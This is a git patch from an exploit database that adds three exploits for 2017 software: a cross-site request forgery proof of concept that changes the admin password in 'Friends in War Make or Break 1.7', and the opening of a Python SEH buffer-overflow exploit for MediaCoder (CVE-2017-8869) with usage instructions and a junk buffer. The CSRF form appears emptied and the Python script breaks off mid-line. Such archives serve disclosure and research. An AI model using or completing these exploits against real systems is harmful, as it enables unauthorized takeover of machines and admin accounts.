From 82b7d150c6f7a6ee62674b8a5d18eaa47c7718fa Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Jul 2017 05:01:21 +0000 Subject: [PATCH] DB: 2017-07-28 3 new exploits MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) AudioCoder 0.8.46 - Local Buffer Overflow (SEH) Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password) --- files.csv | 3 ++ platforms/php/webapps/42383.html | 17 ++++++++++ platforms/windows/local/42384.py | 54 ++++++++++++++++++++++++++++++++ platforms/windows/local/42385.py | 52 ++++++++++++++++++++++++++++++ 4 files changed, 126 insertions(+) create mode 100755 platforms/php/webapps/42383.html create mode 100755 platforms/windows/local/42384.py create mode 100755 platforms/windows/local/42385.py diff --git a/files.csv b/files.csv index 582ab7d54..f376482aa 100644 --- a/files.csv +++ b/files.csv @@ -9153,6 +9153,8 @@ id,file,description,date,author,platform,type,port 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0 42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0 +42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0 +42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -38182,4 +38184,5 @@ id,file,description,date,author,platform,type,port 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0 42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0 +42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/42383.html b/platforms/php/webapps/42383.html new file mode 100755 index 000000000..56173d837 --- /dev/null +++ b/platforms/php/webapps/42383.html @@ -0,0 +1,17 @@ +Friends in War Make or Break 1.7 - Unauthenticated admin password change + +Url: http://software.friendsinwar.com/ + http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9 + +Author: shinnai +mail: shinnai[at]autistici[dot]org +site: http://www.shinnai.altervista.org/ +--------------------------------------------------------------------- + +PROOF OF CONCEPT: +
+ + + + +
diff --git a/platforms/windows/local/42384.py b/platforms/windows/local/42384.py new file mode 100755 index 000000000..c12c09a5e --- /dev/null +++ b/platforms/windows/local/42384.py @@ -0,0 +1,54 @@ +#!/usr/bin/python +# Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH) +# CVE : CVE-2017-8869 +# Exploit Author : Muhann4d @0xSecured +# Vendor Homepage : http://www.mediacoderhq.com +# Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe +# Vulnerable Version : 0.8.48.5888 +# Fixed version : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe +# Category : Local Buffer Overflow +# Tested on OS : Windows 7 Pro SP1 32bit +# How to : Open MediaCoder then drag & drop the .m3u file in it and then press the START button. +# or just write click on the .mu3 file .. open with .. MediaCoder +# Timeline : +# 2017-05-05: Vulnerability discovered, vendor has been contaced +# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" +# 2017-05-09: A POC sent to the vendor. +# 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/ +# 2017-06-26: Exploit released. + +print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured" +from struct import pack + +junk = "http://" + "\x41" * 361 +nseh = pack('